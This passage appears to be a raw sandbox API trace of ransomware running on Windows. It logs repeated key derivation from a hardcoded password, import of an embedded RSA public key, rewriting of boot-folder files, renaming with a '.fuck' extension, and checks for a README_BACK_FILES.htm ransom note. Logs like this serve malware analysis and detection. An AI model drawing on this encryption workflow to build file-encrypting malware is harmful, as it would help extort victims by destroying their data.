"c:\\boot\\qps-ploc\\memtest.exe.mui.gsg")) returned 0 [0231.681] MoveFileA (lpExistingFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui.fuck")) returned 0 [0231.681] CryptDestroyHash (hHash=0x2716f68) returned 1 [0231.681] CryptDestroyKey (hKey=0x27167e8) returned 1 [0231.681] CryptReleaseContext (hProv=0x2781b28, dwFlags=0x0) returned 1 [0231.681] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.681] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.681] FindClose (in: hFindFile=0x2716de8 | out: hFindFile=0x2716de8) returned 1 [0231.681] GetFileAttributesA (lpFileName="C:\\\\Boot\\qps-ploc\\README_BACK_FILES.htm" (normalized: "c:\\boot\\qps-ploc\\readme_back_files.htm")) returned 0x20 [0231.681] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.681] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.681] FindFirstFileA (in: lpFileName="C:\\\\Boot\\Resources\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716f68 [0231.681] FindNextFileA (in: hFindFile=0x2716f68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.682] FindNextFileA (in: hFindFile=0x2716f68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.682] FindNextFileA (in: hFindFile=0x2716f68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.682] FindFirstFileA (in: lpFileName="C:\\\\Boot\\Resources\\en-US\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2716c28 [0231.682] FindNextFileA (in: hFindFile=0x2716c28, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0231.682] FindNextFileA (in: hFindFile=0x2716c28, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0231.682] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0231.682] GetLastError () returned 0x12 [0231.682] GetFileAttributesA (lpFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui")) returned 0x20 [0231.682] SetFileAttributesA (lpFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui", dwFileAttributes=0x80) returned 0 [0231.683] CreateFileA (lpFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.683] CreateFileA (lpFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui.gsg" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.683] SetFileAttributesA (lpFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.683] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2781330) returned 1 [0231.685] CryptCreateHash (in: hProv=0x2781330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0231.685] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.685] CryptHashData (hHash=0x2716b28, pbData=0x2ec8a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.685] CryptDeriveKey (in: hProv=0x2781330, Algid=0x6610, hBaseData=0x2716b28, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x2716c68) returned 1 [0231.685] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.685] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0231.685] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2781660) returned 1 [0231.685] CryptImportPublicKeyInfo (in: hCryptProv=0x2781660, dwCertEncodingType=0x1, pInfo=0x277c270*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277c2a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277c2a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x2716de8) returned 1 [0231.686] CryptEncrypt (in: hKey=0x2716de8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0231.686] CryptEncrypt (in: hKey=0x2716de8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2780bc0*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2780bc0*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0231.686] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2780bc0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0231.686] ReadFile (in: hFile=0xffffffff, lpBuffer=0x278bb38, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x278bb38, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0231.686] CryptEncrypt (in: hKey=0x2716c68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x278bb38*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x278bb38*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0231.686] WriteFile (in: hFile=0xffffffff, lpBuffer=0x278bb38, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0231.686] CloseHandle (hObject=0xffffffff) returned 1 [0231.686] CloseHandle (hObject=0xffffffff) returned 1 [0231.686] CopyFileA (lpExistingFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui.gsg" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui.gsg"), lpNewFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), bFailIfExists=0) returned 0 [0231.686] SetFileAttributesA (lpFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui", dwFileAttributes=0x0) returned 0 [0231.686] DeleteFileA (lpFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui.gsg" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui.gsg")) returned 0 [0231.687] MoveFileA (lpExistingFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), lpNewFileName="C:\\\\Boot\\Resources\\en-US\\bootres.dll.mui.fuck" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui.fuck")) returned 0 [0231.687] CryptDestroyHash (hHash=0x2716b28) returned 1 [0231.687] CryptDestroyKey (hKey=0x2716c68) returned 1 [0231.687] CryptReleaseContext (hProv=0x2781330, dwFlags=0x0) returned 1 [0231.687] FindNextFileA (in: hFindFile=0x2716c28, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0231.687] FindNextFileA (in: hFindFile=0x2716c28, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0231.687] FindClose (in: hFindFile=0x2716c28 | out: hFindFile=0x2716c28) returned 1 [0231.687] GetFileAttributesA (lpFileName="C:\\\\Boot\\Resources\\en-US\\README_BACK_FILES.htm" (normalized: "c:\\boot\\resources\\en-us\\readme_back_files.htm")) returned 0x20 [0231.688] FindNextFileA (in: hFindFile=0x2716f68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.688] FindNextFileA (in: hFindFile=0x2716f68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.688] FindClose (in: hFindFile=0x2716f68 | out: hFindFile=0x2716f68) returned 1 [0231.688] GetFileAttributesA (lpFileName="C:\\\\Boot\\Resources\\README_BACK_FILES.htm" (normalized: "c:\\boot\\resources\\readme_back_files.htm")) returned 0x20 [0231.693] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.693] FindFirstFileA (in: lpFileName="C:\\\\Boot\\ro-RO\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716868 [0231.693] FindNextFileA (in: hFindFile=0x2716868, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.693] FindNextFileA (in: hFindFile=0x2716868, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.693] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.693] GetLastError () returned 0x12 [0231.693] GetFileAttributesA (lpFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui")) returned 0x20 [0231.693] SetFileAttributesA (lpFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.694] CreateFileA (lpFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.694] CreateFileA (lpFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.694] SetFileAttributesA (lpFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.694] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781330) returned 1 [0231.696] CryptCreateHash (in: hProv=0x2781330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.696] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.696] CryptHashData (hHash=0x2716f68, pbData=0x2ecaf8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.696] CryptDeriveKey (in: hProv=0x2781330, Algid=0x6610, hBaseData=0x2716f68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716aa8) returned 1 [0231.696] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.696] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.696] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2781b28) returned 1 [0231.696] CryptImportPublicKeyInfo (in: hCryptProv=0x2781b28, dwCertEncodingType=0x1, pInfo=0x277bf30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277bf60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277bf68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716b28) returned 1 [0231.697] CryptEncrypt (in: hKey=0x2716b28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.697] CryptEncrypt (in: hKey=0x2716b28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2780c48*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2780c48*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.697] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2780c48, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.697] ReadFile (in: hFile=0xffffffff, lpBuffer=0x278ab30, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x278ab30, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.697] CryptEncrypt (in: hKey=0x2716aa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x278ab30*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x278ab30*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.697] WriteFile (in: hFile=0xffffffff, lpBuffer=0x278ab30, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.697] CloseHandle (hObject=0xffffffff) returned 1 [0231.697] CloseHandle (hObject=0xffffffff) returned 1 [0231.697] CopyFileA (lpExistingFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.697] SetFileAttributesA (lpFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.697] DeleteFileA (lpFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui.gsg")) returned 0 [0231.698] MoveFileA (lpExistingFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\ro-RO\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui.fuck")) returned 0 [0231.698] CryptDestroyHash (hHash=0x2716f68) returned 1 [0231.698] CryptDestroyKey (hKey=0x2716aa8) returned 1 [0231.698] CryptReleaseContext (hProv=0x2781330, dwFlags=0x0) returned 1 [0231.698] FindNextFileA (in: hFindFile=0x2716868, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.698] FindNextFileA (in: hFindFile=0x2716868, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.698] FindClose (in: hFindFile=0x2716868 | out: hFindFile=0x2716868) returned 1 [0231.698] GetFileAttributesA (lpFileName="C:\\\\Boot\\ro-RO\\README_BACK_FILES.htm" (normalized: "c:\\boot\\ro-ro\\readme_back_files.htm")) returned 0x20 [0231.699] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.699] FindFirstFileA (in: lpFileName="C:\\\\Boot\\ru-RU\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716f68 [0231.701] FindNextFileA (in: hFindFile=0x2716f68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.701] FindNextFileA (in: hFindFile=0x2716f68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.701] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.701] GetLastError () returned 0x12 [0231.701] GetFileAttributesA (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui")) returned 0x20 [0231.701] SetFileAttributesA (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.702] CreateFileA (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.702] CreateFileA (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.702] SetFileAttributesA (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.702] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781330) returned 1 [0231.704] CryptCreateHash (in: hProv=0x2781330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.704] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.704] CryptHashData (hHash=0x2716868, pbData=0x2ec800, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.704] CryptDeriveKey (in: hProv=0x2781330, Algid=0x6610, hBaseData=0x2716868, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716b68) returned 1 [0231.704] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.704] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.704] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2782760) returned 1 [0231.705] CryptImportPublicKeyInfo (in: hCryptProv=0x2782760, dwCertEncodingType=0x1, pInfo=0x277c340*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277c370*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277c378*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716a28) returned 1 [0231.705] CryptEncrypt (in: hKey=0x2716a28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.705] CryptEncrypt (in: hKey=0x2716a28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2782078*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2782078*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.705] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2782078, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.705] ReadFile (in: hFile=0xffffffff, lpBuffer=0x278ab30, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x278ab30, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.705] CryptEncrypt (in: hKey=0x2716b68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x278ab30*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x278ab30*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.705] WriteFile (in: hFile=0xffffffff, lpBuffer=0x278ab30, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.705] CloseHandle (hObject=0xffffffff) returned 1 [0231.705] CloseHandle (hObject=0xffffffff) returned 1 [0231.705] CopyFileA (lpExistingFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.705] SetFileAttributesA (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.706] DeleteFileA (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.gsg")) returned 0 [0231.706] MoveFileA (lpExistingFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.fuck")) returned 0 [0231.706] CryptDestroyHash (hHash=0x2716868) returned 1 [0231.706] CryptDestroyKey (hKey=0x2716b68) returned 1 [0231.706] CryptReleaseContext (hProv=0x2781330, dwFlags=0x0) returned 1 [0231.706] FindNextFileA (in: hFindFile=0x2716f68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.706] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.706] GetLastError () returned 0x5 [0231.706] GetFileAttributesA (lpFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui")) returned 0x20 [0231.706] SetFileAttributesA (lpFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.706] CreateFileA (lpFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.707] CreateFileA (lpFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.707] SetFileAttributesA (lpFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.707] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781330) returned 1 [0231.709] CryptCreateHash (in: hProv=0x2781330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.709] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.709] CryptHashData (hHash=0x2716ce8, pbData=0x2ec698, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.709] CryptDeriveKey (in: hProv=0x2781330, Algid=0x6610, hBaseData=0x2716ce8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x27167e8) returned 1 [0231.709] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.709] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.709] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 